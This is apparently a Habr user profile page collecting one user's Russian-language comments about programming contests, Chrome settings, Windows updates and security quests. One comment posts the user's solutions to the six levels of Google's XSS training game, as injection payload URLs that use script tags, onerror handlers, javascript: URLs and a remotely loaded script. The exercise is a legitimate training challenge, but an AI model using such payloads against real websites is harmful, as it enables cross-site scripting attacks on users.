Pull to refresh
9
0
Александр @CyberLight

Пользователь

Send message
:) Да, сложность, к сожалению, разной бывает, но при решении какой-либо задачки, она переходит в разряд побежденных. И все повторяется снова.
Дело в том, что во время самого контеста и во время дополнительного «вирутального контеста» действительно никто не решил 5-ую и 6-ую задачу (судя по таблице положения участников). 5- ую задачу пытались решить, я тоже пытался но больше 11 баллов из 50 не получил.

После этого, обновление таблицы участников заморозилось. Я решил 6-ую задачу про «Галактического коллектора» (задача про оптимальный перевод стрелок) уже после контеста и дополнительного виртуального контеста, но до публикации этой статьи.

Думаю тут приводились цифры решений задач не только во время контеста ) а в общем. Что намекает на то, что не стоит расстариваться и продолжать дорешивать задачи. Получаешь очень хороший опыт! Советую :)
А бывает так, что какая либо задача, тесты на которую не стабильны, являлась связной с несколькими другими задачами и релиз приходилось откладывать? Или вы избегаете релизить такой пирог и в один релиз уходит базовая задача, которая подготавливает плацдарм (и не обязательно визуальный) для следующих N задач, а зависимые уходят в другой релиз?
Спасибо большое за чемпионат!

Я в этот раз впервые участвовал. Задачи по фронтенду максимально понравились. Особенно задача про часы и про баркод для котиков! Я не добрался в отведенное время до задачи (F. Задача Framework-часов — она же Галактический коллектор), но затем все же решил ее (получив так же опыт), после чемпионата. Спасибо большое за новый опыт!

Ну а теперь, после публикации решений в этой статье, у меня будет возможность поглядеть на свои ошибки в «Пандемии Вируса» — это единственная задачка, которую не осилил при дорешивании задач, после завершения чемпионата. Это уникальный опыт для меня. Задачи дают примерное направление, с чем придется столкнуться в работе фронтендером в Яндекс.

Очень помогают узнать реальный уровень и увидеть свои недостатки. Если бы еще почаще бы такие классные чемпионаты проводились, было бы вообще круто!

Спасибо команде Яндекс, тем кто подготовил эти задачи, протестировал их и тем кто поддерживает платформу Яндекс.Контест
Тоже с нетерпением жду, когда начнется 10-ая версия лаборатории, от Pentestit! Огромное спасибо за Ваш нелегкий труд, в подготовке такого уровня лаборатории!
К сожалению, уже не получится его пройти, так как хак квест уже завершен. Он проходил в период с 29 апреля по 7 мая. Похоже все сервисы и сам сайт свернули. Сожалею.
Сайт организаторов cis.kg
Полет нормальный Win 8.1 (лицензия) Установлено обновление 28.08.2014, нотник постоянно включен, BSOD не наблюдаю. Обновления ставятся автоматически.

image
А Вы чередуйте, немного работайте в браузере со сглаживанием, немного без. А там глядишь привыкните к сглаженному шрифту :) и все будет нормально восприниматься. Новое всегда привносит смуту.
Тогда можно просто попробовать отрубить DirectWrite (это экспериментальный движок рендеринга шрифтов)
Перейти на страницу chrome://flags/
Активировать пункт «disable DirectWrite»
Понятно, значит не пофиксили. Хотя было упомянуто что это пофиксят в 37M, но как видим наименование канала так и остается странным.
Можно добавить следующие параметры старта chrome "****/chrome.exe" /high-dpi-support=1 /force-device-scale-factor=1 возможно поможет. Затем перезапустить chrome.
У меня после установки x64 версии, в окне «О программе» отображается «Версия 37.0.2062.94 unknown-m (64-bit)».
Обновился тоже нормально, x86 версию не удалял, просто закрыл браузер и запустил установку x64 версии. Все закладки и профиль сохранены. Полет нормальный!
И в общем-то за решение данных уровней никто не выдает ценных призов или признания. Я к примеру когда увидел статью на хабре, понесся решать задачки и не смотрел в комментарии. Как только решил задачи, пошел читать комментарии, было интересно посмотреть как решали другие. Вот и все. Я не хотел никому навредить или отбить желание решать задачки. В следующий раз буду знать, что выкладывать решения тут не стоит. Извините.
Ну а что тут необычного? Вместо того, чтобы отправлять сообщение в чат, проще править одно сообщение, которое хранится в LocalStorage. В LocalStorage хранится массив объектов сообщений, в начале оно там одно. Вот и можно спокойненько подобрать нужный вектор. При этом обновлять страничку, чтобы приложение чата брало уже измененное сообщение из LocalStorage. Просто мне так было удобнее.
Задания действительно легкие, но просто хотелось поделиться своими решениями, хоть они может быть и будут похоже на решения остальных. Совсем не хотел чтобы это выглядело как «не спортивное поведение». Раз это тема информационной безопасности, то было бы классно рассмотреть решения каждого уровня.
Ну все, не выдержал! Выкладываю свои решения. Только смотрите после того, как пройдете сами.

Level1
https://xss-game.appspot.com/level1/frame?query='+">+<script>alert('XSS!')</script>+"'


Level2
Тут нужно править Local Storage ключ postDB и смотреть на изменения HTML маркапа в браузере после обновления содержимого чата
{"posts":[{"message":"</table><img src='http://localhost/1.jpg' onerror='javascript:alert(123)'","date":1401689467145}]}


Level3
https://xss-game.appspot.com/level3/frame#4.jpg' onerror='javascript:alert(123)' /><!--


Level4
https://xss-game.appspot.com/level4/frame?timer=')/ alert('123


Level5
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('123')


Level6
https://xss-game.appspot.com/level6/frame#//dl.dropboxusercontent.com/s/br98ryrw9fq3c4p/check.js

Вот к примеру, очень хорошо рассматриваются паттерны на dofactory.com в разделе ".NET Design Patterns". Там есть и простые и из реального мира примеры на каждый паттерн :). Я пользуюсь этим ресурсом.
Просто не очень интуитивно понятно что 0 — это «Никогда» («Never»). Лучше бы как раньше оставили, чтобы был ниспадающий список :) Да и как то я думаю, это лишнее, пользователю, выставлять точное кол-во минут :), достаточно стандартного набора :) 1 мин, 2 мин, 3 мин, 5 мин, 10 мин, 15 мин… 1 ч, 2 ч… Never и т.д. :)
Нет нет, не убрали :) Просто побоялся менять, мало ли все же Preview :). Побоялся ставить в 0 :) Сейчас попробовал, все нормально «Никогда» отображается. Спасибо! :)

Information

Rating
Does not participate
Registered
Activity